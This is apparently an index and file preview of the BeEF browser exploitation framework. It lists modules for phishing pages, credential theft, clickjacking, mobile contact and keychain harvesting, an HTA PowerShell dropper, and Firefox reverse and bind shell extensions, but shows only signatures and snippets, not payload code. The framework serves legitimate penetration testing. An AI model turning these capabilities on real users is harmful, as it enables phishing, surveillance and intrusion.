FILE: modules/network/port_scanner/command.js
function check_blocked (line 65) | function check_blocked(port_to_check)
function prepare_ports (line 80) | function prepare_ports()
function cors_scan (line 115) | function cors_scan(hostname, port_)
function websocket_scan (line 185) | function websocket_scan(hostname, port_)
function http_scan (line 264) | function http_scan(protocol_, hostname, port_)
FILE: modules/network/port_scanner/module.rb
class Port_scanner (line 11) | class Port_scanner < BeEF::Core::Command
method options (line 12) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/persistence/confirm_close_tab/command.js
function display_confirm (line 9) | function display_confirm(){
function dontleave (line 15) | function dontleave(e){
FILE: modules/persistence/confirm_close_tab/module.rb
class Confirm_close_tab (line 6) | class Confirm_close_tab < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 22) | def post_execute
FILE: modules/persistence/hijack_opener/module.rb
class Hijack_opener (line 6) | class Hijack_opener < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method post_execute (line 28) | def post_execute
FILE: modules/persistence/iframe_above/module.rb
class Iframe_above (line 6) | class Iframe_above < BeEF::Core::Command
method post_execute (line 10) | def post_execute
FILE: modules/persistence/invisible_htmlfile_activex/module.rb
class Invisible_htmlfile_activex (line 6) | class Invisible_htmlfile_activex < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/persistence/jsonp_service_worker/module.rb
class Jsonp_service_worker (line 1) | class Jsonp_service_worker < BeEF::Core::Command
method post_execute (line 2) | def post_execute
method options (line 6) | def self.options
FILE: modules/persistence/man_in_the_browser/module.rb
class Man_in_the_browser (line 7) | class Man_in_the_browser < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/persistence/popunder_window/command.js
function popunder (line 11) | function popunder() {
FILE: modules/persistence/popunder_window/module.rb
class Popunder_window (line 6) | class Popunder_window < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/persistence/popunder_window_ie/module.rb
class Popunder_window_ie (line 6) | class Popunder_window_ie < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/phonegap/phonegap_alert_user/command.js
function onAlert (line 15) | function onAlert() {
FILE: modules/phonegap/phonegap_alert_user/module.rb
class Phonegap_alert_user (line 9) | class Phonegap_alert_user < BeEF::Core::Command
method options (line 10) | def self.options
method callback (line 32) | def callback
FILE: modules/phonegap/phonegap_beep/module.rb
class Phonegap_beep (line 9) | class Phonegap_beep < BeEF::Core::Command
method post_execute (line 10) | def post_execute
FILE: modules/phonegap/phonegap_check_connection/module.rb
class Phonegap_check_connection (line 9) | class Phonegap_check_connection < BeEF::Core::Command
method post_execute (line 10) | def post_execute
FILE: modules/phonegap/phonegap_detect/module.rb
class Phonegap_detect (line 9) | class Phonegap_detect < BeEF::Core::Command
method post_execute (line 10) | def post_execute
FILE: modules/phonegap/phonegap_file_upload/command.js
function win (line 13) | function win(r) {
function fail (line 19) | function fail(error) {
function beef_upload (line 25) | function beef_upload(file_path, upload_url) {
FILE: modules/phonegap/phonegap_file_upload/module.rb
class Phonegap_file_upload (line 9) | class Phonegap_file_upload < BeEF::Core::Command
method options (line 10) | def self.options
method callback (line 26) | def callback
FILE: modules/phonegap/phonegap_geo_locate/command.js
function onError (line 29) | function onError(error) {
FILE: modules/phonegap/phonegap_geo_locate/module.rb
class Phonegap_geo_locate (line 9) | class Phonegap_geo_locate < BeEF::Core::Command
method post_execute (line 10) | def post_execute
FILE: modules/phonegap/phonegap_globalization_status/module.rb
class Phonegap_globalization_status (line 8) | class Phonegap_globalization_status < BeEF::Core::Command
method post_execute (line 9) | def post_execute
FILE: modules/phonegap/phonegap_keychain/command.js
function onGet (line 24) | function onGet()
function onSet (line 40) | function onSet()
function onRemove (line 54) | function onRemove()
FILE: modules/phonegap/phonegap_keychain/module.rb
class Phonegap_keychain (line 9) | class Phonegap_keychain < BeEF::Core::Command
method options (line 10) | def self.options
method callback (line 46) | def callback
FILE: modules/phonegap/phonegap_list_contacts/command.js
function onSuccess (line 12) | function onSuccess(contacts) {
function onError (line 34) | function onError(contactError) {
FILE: modules/phonegap/phonegap_list_contacts/module.rb
class Phonegap_list_contacts (line 8) | class Phonegap_list_contacts < BeEF::Core::Command
method post_execute (line 9) | def post_execute
FILE: modules/phonegap/phonegap_list_files/command.js
function fail (line 13) | function fail() {
function success (line 19) | function success(entries) {
function gotDirEntry (line 29) | function gotDirEntry(dirEntry) {
function gotFS (line 35) | function gotFS(fileSystem) {
FILE: modules/phonegap/phonegap_list_files/module.rb
class Phonegap_list_files (line 9) | class Phonegap_list_files < BeEF::Core::Command
method options (line 10) | def self.options
method callback (line 20) | def callback
FILE: modules/phonegap/phonegap_persist_resume/module.rb
class Phonegap_persist_resume (line 8) | class Phonegap_persist_resume < BeEF::Core::Command
method post_execute (line 9) | def post_execute
FILE: modules/phonegap/phonegap_persistence/command.js
function write_file (line 26) | function write_file(text) {
function replace_text (line 52) | function replace_text(text) {
function read_index (line 60) | function read_index(app_name) {
function locate (line 86) | function locate() {
FILE: modules/phonegap/phonegap_persistence/module.rb
class Phonegap_persistence (line 9) | class Phonegap_persistence < BeEF::Core::Command
method options (line 10) | def self.options
method post_execute (line 26) | def post_execute
FILE: modules/phonegap/phonegap_plugin_detection/module.rb
class Phonegap_plugin_detection (line 8) | class Phonegap_plugin_detection < BeEF::Core::Command
method post_execute (line 9) | def post_execute
FILE: modules/phonegap/phonegap_prompt_user/command.js
function onPrompt (line 19) | function onPrompt(results) {
FILE: modules/phonegap/phonegap_prompt_user/module.rb
class Phonegap_prompt_user (line 9) | class Phonegap_prompt_user < BeEF::Core::Command
method options (line 10) | def self.options
method callback (line 45) | def callback
FILE: modules/phonegap/phonegap_start_record_audio/module.rb
class Phonegap_start_record_audio (line 9) | class Phonegap_start_record_audio < BeEF::Core::Command
method options (line 10) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/phonegap/phonegap_stop_record_audio/module.rb
class Phonegap_stop_record_audio (line 9) | class Phonegap_stop_record_audio < BeEF::Core::Command
FILE: modules/social_engineering/clickjacking/command.js
function cleanPos (line 49) | function cleanPos(coordinate) {
function init (line 58) | function init(params, styles, stylesInner, callback) {
function step1 (line 70) | function step1(){
function iframeClicked (line 88) | function iframeClicked(){
function updateIframePosition (line 116) | function updateIframePosition(){
function removeAll (line 124) | function removeAll(){
function cjLog (line 129) | function cjLog(msg){
FILE: modules/social_engineering/clickjacking/module.rb
class Clickjacking (line 7) | class Clickjacking < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 69) | def post_execute
FILE: modules/social_engineering/clippy/command.js
function __clippyboot (line 16) | function __clippyboot(run) {
FILE: modules/social_engineering/clippy/module.rb
class Clippy (line 6) | class Clippy < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 14) | def self.options
method post_execute (line 36) | def post_execute
FILE: modules/social_engineering/edge_wscript_wsh_injection/module.rb
class Edge_wscript_wsh_injection (line 6) | class Edge_wscript_wsh_injection < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 46) | def self.options
method post_execute (line 52) | def post_execute
FILE: modules/social_engineering/fake_evernote_clipper/module.rb
class Fake_evernote_clipper (line 6) | class Fake_evernote_clipper < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method post_execute (line 23) | def post_execute
FILE: modules/social_engineering/fake_flash_update/module.rb
class Fake_flash_update (line 6) | class Fake_flash_update < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 11) | def self.options
method post_execute (line 26) | def post_execute
FILE: modules/social_engineering/fake_lastpass/module.rb
class Fake_lastpass (line 6) | class Fake_lastpass < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method post_execute (line 19) | def post_execute
FILE: modules/social_engineering/fake_notification/module.rb
class Fake_notification (line 6) | class Fake_notification < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/social_engineering/fake_notification_c/module.rb
class Fake_notification_c (line 6) | class Fake_notification_c < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 27) | def post_execute
FILE: modules/social_engineering/fake_notification_ff/module.rb
class Fake_notification_ff (line 6) | class Fake_notification_ff < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/social_engineering/fake_notification_ie/module.rb
class Fake_notification_ie (line 6) | class Fake_notification_ie < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 27) | def post_execute
FILE: modules/social_engineering/firefox_extension_bindshell/extension/bootstrap.js
function startup (line 2) | function startup(data, reason) {
FILE: modules/social_engineering/firefox_extension_bindshell/module.rb
class Firefox_extension_bindshell (line 6) | class Firefox_extension_bindshell < BeEF::Core::Command
class Bind_extension (line 7) | class Bind_extension < BeEF::Core::Router::Router
method pre_send (line 25) | def pre_send
method options (line 65) | def self.options
method post_execute (line 73) | def post_execute
FILE: modules/social_engineering/firefox_extension_dropper/extension/bootstrap.js
function startup (line 2) | function startup(data, reason) {
FILE: modules/social_engineering/firefox_extension_dropper/module.rb
class Firefox_extension_dropper (line 6) | class Firefox_extension_dropper < BeEF::Core::Command
class Bind_extension (line 7) | class Bind_extension < BeEF::Core::Router::Router
method pre_send (line 25) | def pre_send
method options (line 75) | def self.options
method post_execute (line 88) | def post_execute
FILE: modules/social_engineering/firefox_extension_reverse_shell/extension/bootstrap.js
function startup (line 2) | function startup(data, reason) {
FILE: modules/social_engineering/firefox_extension_reverse_shell/module.rb
class Firefox_extension_reverse_shell (line 6) | class Firefox_extension_reverse_shell < BeEF::Core::Command
class Bind_extension (line 7) | class Bind_extension < BeEF::Core::Router::Router
method pre_send (line 25) | def pre_send
method options (line 68) | def self.options
method post_execute (line 79) | def post_execute
FILE: modules/social_engineering/gmail_phishing/command.js
function logoutGoogle (line 25) | function logoutGoogle() {
function displayPhishingSite (line 36) | function displayPhishingSite(){
FILE: modules/social_engineering/gmail_phishing/module.rb
class Gmail_phishing (line 6) | class Gmail_phishing < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 40) | def post_execute
FILE: modules/social_engineering/hta_powershell/module.rb
class Hta_powershell (line 6) | class Hta_powershell < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/social_engineering/lcamtuf_download/command.js
function doit (line 13) | function doit() {
function donext (line 21) | function donext() {
FILE: modules/social_engineering/lcamtuf_download/module.rb
class Lcamtuf_download (line 6) | class Lcamtuf_download < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 28) | def post_execute
FILE: modules/social_engineering/pretty_theft/command.js
function grayOut (line 12) | function grayOut(vis, options) {
function win (line 72) | function win(){
function checker (line 79) | function checker(){
function facebook (line 105) | function facebook() {
function linkedin (line 135) | function linkedin() {
function windows (line 167) | function windows() {
function youtube (line 212) | function youtube() {
function yammer (line 242) | function yammer() {
function ios (line 271) | function ios() {
function generic (line 506) | function generic() {
FILE: modules/social_engineering/pretty_theft/module.rb
class Pretty_theft (line 6) | class Pretty_theft < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 29) | def post_execute
FILE: modules/social_engineering/replace_video_fake_plugin/module.rb
class Replace_video_fake_plugin (line 6) | class Replace_video_fake_plugin < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/social_engineering/simple_hijacker/command.js
function send (line 9) | function send(answer){
FILE: modules/social_engineering/simple_hijacker/module.rb
class Simple_hijacker (line 6) | class Simple_hijacker < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 34) | def post_execute
FILE: modules/social_engineering/simple_hijacker/templates/amazon.js
function writediv (line 21) | function writediv() {
FILE: modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
function writediv (line 8) | function writediv() {
function $ (line 28) | function $(o) {return document.getElementById(o);}
FILE: modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
function $ (line 59) | function $(o) {return document.getElementById(o);}
FILE: modules/social_engineering/simple_hijacker/templates/credential.js
function grayOut (line 16) | function grayOut(vis, options) {
function win (line 73) | function win(){
function checker (line 81) | function checker(){
function writeit (line 100) | function writeit() {
FILE: modules/social_engineering/sitekiosk_breakout/module.rb
class Sitekiosk_breakout (line 6) | class Sitekiosk_breakout < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 14) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/social_engineering/spoof_addressbar_data/module.rb
class Spoof_addressbar_data (line 6) | class Spoof_addressbar_data < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/social_engineering/tabnabbing/module.rb
class Tabnabbing (line 6) | class Tabnabbing < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/social_engineering/text_to_voice/module.rb
class Text_to_voice (line 6) | class Text_to_voice < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 65) | def self.options
method post_execute (line 81) | def post_execute
FILE: modules/social_engineering/ui_abuse_ie/command.js
function spawnPopunder (line 73) | function spawnPopunder(){
FILE: modules/social_engineering/ui_abuse_ie/module.rb
class Ui_abuse_ie (line 11) | class Ui_abuse_ie < BeEF::Core::Command
method options (line 12) | def self.options
method pre_send (line 18) | def pre_send
method post_execute (line 30) | def post_execute
FILE: spec/beef/core/main/handlers/commands_spec.rb
function initialize (line 26) | def initialize(_key)
function friendlyname (line 32) | def friendlyname
function build_callback_datastore (line 36) | def build_callback_datastore(_result, _command_id, _beefhook, _http_para...
function post_execute (line 38) | def post_execute; end
function initialize (line 123) | def initialize(_key)
function friendlyname (line 129) | def friendlyname
function build_callback_datastore (line 133) | def build_callback_datastore(_result, _command_id, _beefhook, _http_para...
FILE: spec/beef/core/ruby/module_spec.rb
function test_method (line 12) | def test_method
FILE: spec/beef/filesystem_checks_spec.rb
function file_test (line 8) | def file_test(file)
FILE: spec/spec_helper.rb
class Capybara::Selenium::Driver (line 51) | class Capybara::Selenium::Driver < Capybara::Driver::Base
method reset! (line 52) | def reset!
type BeEF (line 87) | module BeEF
type Core (line 88) | module Core
type Console (line 89) | module Console
function level= (line 92) | def level=(val)
function level (line 95) | def level
function method_missing (line 99) | def method_missing(m, *args, &blk)
function respond_to_missing? (line 104) | def respond_to_missing?(m, include_priv = false)
type ::Console (line 115) | module ::Console
function level= (line 118) | def level=(val)
function level (line 121) | def level
function method_missing (line 125) | def method_missing(m, *args, &blk)
function respond_to_missing? (line 130) | def respond_to_missing?(m, include_priv = false)
function server_teardown (line 154) | def server_teardown(webdriver, server_pid, server_pids)
function reset_beef_db (line 178) | def reset_beef_db
function port_available? (line 189) | def port_available?
function configure_beef (line 199) | def configure_beef
function load_beef_extensions_and_modules (line 209) | def load_beef_extensions_and_modules
function disconnect_all_active_record! (line 218) | def disconnect_all_active_record!
function start_beef_server (line 235) | def start_beef_server
function beef_server_running? (line 294) | def beef_server_running?(uri_str)
function wait_for_beef_server_to_start (line 306) | def wait_for_beef_server_to_start(uri_str, timeout: 5)
function start_beef_server_and_wait (line 314) | def start_beef_server_and_wait
function stop_beef_server (line 328) | def stop_beef_server(pid)
type SpecActiveRecordConnection (line 341) | module SpecActiveRecordConnection
function snapshot (line 344) | def snapshot
function restore! (line 355) | def restore!(config_hash)
FILE: spec/support/beef_test.rb
class BeefTest (line 12) | class BeefTest
method save_screenshot (line 13) | def self.save_screenshot(session, dir = nil)
method login (line 20) | def self.login(session = nil)
method logout (line 54) | def self.logout(session)
method new_attacker (line 61) | def self.new_attacker(session = nil)
method new_victim (line 65) | def self.new_victim(victim = nil)
FILE: spec/support/simple_rest_client.rb
class BeefRestClient (line 7) | class BeefRestClient
method initialize (line 8) | def initialize(proto, host, port, user, pass)
method is_pass? (line 15) | def is_pass?(passwd)
method auth (line 19) | def auth
method version (line 32) | def version
FILE: spec/support/ui_support.rb
function start_beef_and_hook_browser (line 10) | def start_beef_and_hook_browser()
function stop_beef_and_unhook_browser (line 39) | def stop_beef_and_unhook_browser(pid, beef_session, hooked_browser)
function navigate_to_hooked_browser (line 45) | def navigate_to_hooked_browser(session, hooked_browser_text = nil)
function navigate_to_category (line 56) | def navigate_to_category(session, category_name = nil)
function expand_category_tree (line 69) | def expand_category_tree(session, category, module_name = nil)
function collapse_category_tree (line 100) | def collapse_category_tree(session, category)
function click_on_module (line 113) | def click_on_module(session, category, module_name)
FILE: test/integration/tc_debug_modules.rb
class TC_DebugModules (line 12) | class TC_DebugModules < Test::Unit::TestCase
method test_1_restful_auth (line 27) | def test_1_restful_auth
method test_2_restful_hooks (line 42) | def test_2_restful_hooks
method test_3_restful_modules (line 54) | def test_3_restful_modules
method test_return_long_string (line 75) | def test_return_long_string
method test_return_ascii_chars (line 110) | def test_return_ascii_chars
method test_return_network_request (line 142) | def test_return_network_request
FILE: test/integration/tc_dns_rest.rb
class TC_DnsRest (line 11) | class TC_DnsRest < Test::Unit::TestCase
method startup (line 15) | def startup
method shutdown (line 37) | def shutdown
method test_1_add_rule_good (line 44) | def test_1_add_rule_good
method test_2_add_rule_bad (line 74) | def test_2_add_rule_bad
method add_rule (line 360) | def add_rule(params)
method check_rest_response (line 369) | def check_rest_response(response)
method check_dns_response (line 380) | def check_dns_response(regex, type, pattern)
FILE: test/integration/tc_network_rest.rb
class TC_NetworkRest (line 11) | class TC_NetworkRest < Test::Unit::TestCase
method startup (line 15) | def startup
method shutdown (line 64) | def shutdown
method test_port_scanner_res
Condensed preview — 1592 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (6,747K chars).
[
{
"path": ".dockerignore",
"chars": 78,
"preview": "# Don't copy over git files\n.git\n.github\n.gitignore\ndoc\ndocs\ntest\nupdate-beef\n"
},
{
"path": ".github/CONTRIBUTING.md",
"chars": 4117,
"preview": "# Contributing\n### Anyone is welcome to make BeEF better!\nThank you for wanting to contribute to BeEF. It's effort like "
},
{
"path": ".github/ISSUE_TEMPLATE/bug_report.md",
"chars": 1498,
"preview": "---\r\nname: Bug report\r\nabout: Report a bug to help us improve BeEF\r\n---\r\n\r\n## First Steps\r\n\r\n1. Confirm that your issue "
},
{
"path": ".github/ISSUE_TEMPLATE/config.yml",
"chars": 180,
"preview": "blank_issues_enabled: false\ncontact_links:\n - name: Questions / Support\n url: https://github.com/beefproject/beef/wi"
},
{
"path": ".github/PULL_REQUEST_TEMPLATE.md",
"chars": 635,
"preview": "# Pull Request\n\nThanks for submitting a PR! Please fill in this template where appropriate:\n\n## Category\n*e.g. Bug, Modu"
},
{
"path": ".github/SECURITY.md",
"chars": 274,
"preview": "send security bug reports to security@beefproject.com\n\n**A security report should include:**\n\n1. Description of the prob"
},
{
"path": ".github/dependabot.yml",
"chars": 438,
"preview": "version: 2\nupdates:\n- package-ecosystem: npm\n directory: \"/\"\n schedule:\n interval: daily\n open-pull-requests-limit"
},
{
"path": ".github/workflows/codeql.yml",
"chars": 2733,
"preview": "# For most projects, this workflow file will not need changing; you simply need\n# to commit it to your repository.\n#\n# Y"
},
{
"path": ".github/workflows/dependabot-auto-merge.yml",
"chars": 857,
"preview": "name: Dependabot auto-merge\non: \n pull_request:\n branches:\n - master\n\npermissions:\n contents: write\n pull-r"
},
{
"path": ".github/workflows/dependabot_auto_label.yml",
"chars": 1054,
"preview": "name: 'Auto-label Dependabot PRs'\n\non:\n pull_request_target:\n branches: [ master ]\n types: [ opened, synchronize "
},
{
"path": ".github/workflows/github_actions.yml",
"chars": 2448,
"preview": "name: 'BrowserStack Test'\n\non:\n pull_request_target:\n branches: [ master ]\n types: [ labeled ]\n\njobs:\n ubuntu-jo"
},
{
"path": ".github/workflows/stale.yml",
"chars": 1125,
"preview": "# This workflow warns and then closes issues and PRs that have had no activity for a specified amount of time.\n#\n# You c"
},
{
"path": ".rspec",
"chars": 58,
"preview": "--format documentation\n--color\n--require spec_helper\n-I .\n"
},
{
"path": ".rubocop.yml",
"chars": 699,
"preview": "AllCops:\n Exclude:\n - 'test/**/*'\n - 'tmp/**/*'\n - 'tools/**/*'\n - 'doc/**/*'\n TargetRubyVersion: <%= File"
},
{
"path": ".ruby-gemset",
"chars": 5,
"preview": "beef\n"
},
{
"path": ".ruby-version",
"chars": 6,
"preview": "3.4.7\n"
},
{
"path": "Dockerfile",
"chars": 4422,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "Gemfile",
"chars": 2274,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "INSTALL.txt",
"chars": 1912,
"preview": "===============================================================================\n \n Copyright (c) 2006-2026 Wade Alc"
},
{
"path": "README.md",
"chars": 2865,
"preview": "===============================================================================\n\n Copyright (c) 2006-2026 Wade Alcorn"
},
{
"path": "Rakefile",
"chars": 5741,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "VERSION",
"chars": 190,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "_config.yml",
"chars": 27,
"preview": "theme: jekyll-theme-minimal"
},
{
"path": "arerules/alert.json",
"chars": 280,
"preview": "{\"name\": \"Display an alert\",\n \"author\": \"mgeeky\",\n \"modules\": [\n {\"name\": \"alert_dialog\",\n \"condition\": null,\n"
},
{
"path": "arerules/c_osx_test-return-mods.json",
"chars": 887,
"preview": "{\n \"name\": \"Test return debug stuff\",\n \"author\": \"antisnatchor\",\n \"browser\": \"S\",\n \"browser_version\": \">= 7\",\n \"os\""
},
{
"path": "arerules/confirm_close_tab.json",
"chars": 369,
"preview": "{\"name\": \"Confirm Close Tab\",\n \"author\": \"mgeeky\",\n \"modules\": [\n {\"name\": \"confirm_close_tab\",\n \"condition\": "
},
{
"path": "arerules/enabled/README",
"chars": 142,
"preview": "Move here the ARE rule files that you want to pre-load when BeEF starts.\nMake sure they are .json files (any other file "
},
{
"path": "arerules/ff_osx_extension-dropper.json",
"chars": 435,
"preview": "{\n \"name\": \"Firefox Extension Dropper\",\n \"author\": \"antisnatchor\",\n \"browser\": \"FF\",\n \"os\": \"OSX\",\n \"os_version\": \""
},
{
"path": "arerules/get_cookie.json",
"chars": 240,
"preview": "{\n \"name\": \"Get Cookie\",\n \"author\": \"@benichmt1\",\n \"modules\": [\n {\"name\": \"get_cookie\",\n \"condition\": null,\n "
},
{
"path": "arerules/ie_win_fakenotification-clippy.json",
"chars": 1015,
"preview": "{\n \"name\": \"Ie Fake Notification + Clippy\",\n \"author\": \"antisnatchor\",\n \"browser\": \"IE\",\n \"browser_version\": \"== 11\""
},
{
"path": "arerules/ie_win_htapowershell.json",
"chars": 714,
"preview": "{\n \"name\": \"HTA PowerShell\",\n \"author\": \"antisnatchor\",\n \"browser\": \"IE\",\n \"os\": \"Windows\",\n \"os_version\": \">= 7\",\n"
},
{
"path": "arerules/ie_win_missingflash-prettytheft.json",
"chars": 834,
"preview": "{\n \"name\": \"Fake missing plugin + Pretty Theft LinkedIn\",\n \"author\": \"antisnatchor\",\n \"browser\": \"IE\",\n \"browser_ver"
},
{
"path": "arerules/ie_win_test-return-mods.json",
"chars": 885,
"preview": "{\n \"name\": \"Test return debug stuff\",\n \"author\": \"antisnatchor\",\n \"browser\": \"IE\",\n \"browser_version\": \"<= 8\",\n \"os"
},
{
"path": "arerules/lan_cors_scan.json",
"chars": 714,
"preview": "{\"name\": \"LAN CORS Scan\",\n \"author\": \"bcoles\",\n \"browser\": [\"FF\", \"C\"],\n \"modules\": [\n {\"name\": \"get_internal_ip_w"
},
{
"path": "arerules/lan_cors_scan_common.json",
"chars": 405,
"preview": "{\"name\": \"LAN CORS Scan (Common IPs)\",\n \"author\": \"bcoles\",\n \"modules\": [\n {\"name\": \"cross_origin_scanner_cors\",\n "
},
{
"path": "arerules/lan_fingerprint.json",
"chars": 722,
"preview": "{\"name\": \"LAN Fingerprint\",\n \"author\": \"bcoles\",\n \"browser\": [\"FF\", \"C\"],\n \"modules\": [\n {\"name\": \"get_internal_ip"
},
{
"path": "arerules/lan_fingerprint_common.json",
"chars": 419,
"preview": "{\"name\": \"LAN Fingerprint (Common IPs)\",\n \"author\": \"antisnatchor\",\n \"modules\": [\n {\"name\": \"internal_network_finge"
},
{
"path": "arerules/lan_flash_scan.json",
"chars": 695,
"preview": "{\"name\": \"LAN Flash Scan\",\n \"author\": \"bcoles\",\n \"browser\": [\"FF\", \"C\"],\n \"modules\": [\n {\"name\": \"get_internal_ip_"
},
{
"path": "arerules/lan_flash_scan_common.json",
"chars": 412,
"preview": "{\"name\": \"LAN Flash Scan (Common IPs)\",\n \"author\": \"bcoles\",\n \"browser\": [\"FF\", \"C\"],\n \"modules\": [\n {\"name\": \"cro"
},
{
"path": "arerules/lan_http_scan.json",
"chars": 704,
"preview": "{\"name\": \"LAN HTTP Scan\",\n \"author\": \"bcoles\",\n \"browser\": [\"FF\", \"C\"],\n \"modules\": [\n {\"name\": \"get_internal_ip_w"
},
{
"path": "arerules/lan_http_scan_common.json",
"chars": 395,
"preview": "{\"name\": \"LAN HTTP Scan (Common IPs)\",\n \"author\": \"bcoles\",\n \"modules\": [\n {\"name\": \"get_http_servers\",\n \"cond"
},
{
"path": "arerules/lan_ping_sweep.json",
"chars": 621,
"preview": "{\"name\": \"LAN Ping Sweep\",\n \"author\": \"bcoles\",\n \"browser\": \"FF\",\n \"modules\": [\n {\"name\": \"get_internal_ip_webrtc\""
},
{
"path": "arerules/lan_ping_sweep_common.json",
"chars": 338,
"preview": "{\"name\": \"LAN Ping Sweep (Common IPs)\",\n \"author\": \"bcoles\",\n \"browser\": \"FF\",\n \"modules\": [\n {\"name\": \"ping_sweep"
},
{
"path": "arerules/lan_port_scan.json",
"chars": 685,
"preview": "{\"name\": \"LAN Port Scan\",\n \"author\": \"aburro & aussieklutz\",\n \"modules\": [\n {\"name\": \"get_internal_ip_webrtc\",\n "
},
{
"path": "arerules/lan_sw_port_scan.json",
"chars": 581,
"preview": "{\"name\": \"LAN SW Port Scan\",\n \"author\": \"aburro & aussieklutz\",\n \"modules\": [\n {\"name\": \"get_internal_ip_webrtc\",\n "
},
{
"path": "arerules/man_in_the_browser.json",
"chars": 270,
"preview": "{\"name\": \"Perform Man-In-The-Browser\",\n \"author\": \"mgeeky\",\n \"modules\": [\n {\"name\": \"man_in_the_browser\",\n \"co"
},
{
"path": "arerules/raw_javascript.json",
"chars": 289,
"preview": "{\n \"name\": \"Raw JavaScript\",\n \"author\": \"wade@bindshell.net\",\n \"modules\": [\n {\"name\": \"raw_javascript\",\n \"con"
},
{
"path": "arerules/record_snapshots.json",
"chars": 330,
"preview": "{\"name\": \"Collects multiple snapshots of the webpage within Same-Origin\",\n \"author\": \"mgeeky\",\n \"modules\": [\n {\"nam"
},
{
"path": "arerules/win_fake_malware.json",
"chars": 5882,
"preview": "// note: update your dropper URL (dropper.local) in each of the modules below\n{\n \"name\": \"Windows Fake Malware\",\n \"aut"
},
{
"path": "beef",
"chars": 7976,
"preview": "#!/usr/bin/env ruby\n\n#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF"
},
{
"path": "beef_cert.pem",
"chars": 1460,
"preview": "-----BEGIN CERTIFICATE-----\nMIIECTCCAnGgAwIBAgIUbx/YybkSOL8uO0qikl/wsL4xLeIwDQYJKoZIhvcNAQEL\nBQAwFDESMBAGA1UEAwwJbG9jYWx"
},
{
"path": "beef_key.pem",
"chars": 2484,
"preview": "-----BEGIN PRIVATE KEY-----\nMIIG/gIBADANBgkqhkiG9w0BAQEFAASCBugwggbkAgEAAoIBgQC15AnZ+ig598ZT\nyMWQCsKwVollblZK5zmPuLZyIbQ"
},
{
"path": "conf.json",
"chars": 316,
"preview": "{\n \"source\": {\n \"include\": [\"./core/main/client\"],\n \"includePattern\": \".js$\"\n },\n \"plugins\": [\n "
},
{
"path": "config.yaml",
"chars": 6276,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/extension.rb",
"chars": 372,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/extensions.rb",
"chars": 434,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/main/configuration.rb",
"chars": 535,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/main/migration.rb",
"chars": 440,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/main/network_stack/assethandler.rb",
"chars": 1658,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/main/server/hook.rb",
"chars": 557,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/main/server.rb",
"chars": 1357,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/module.rb",
"chars": 2126,
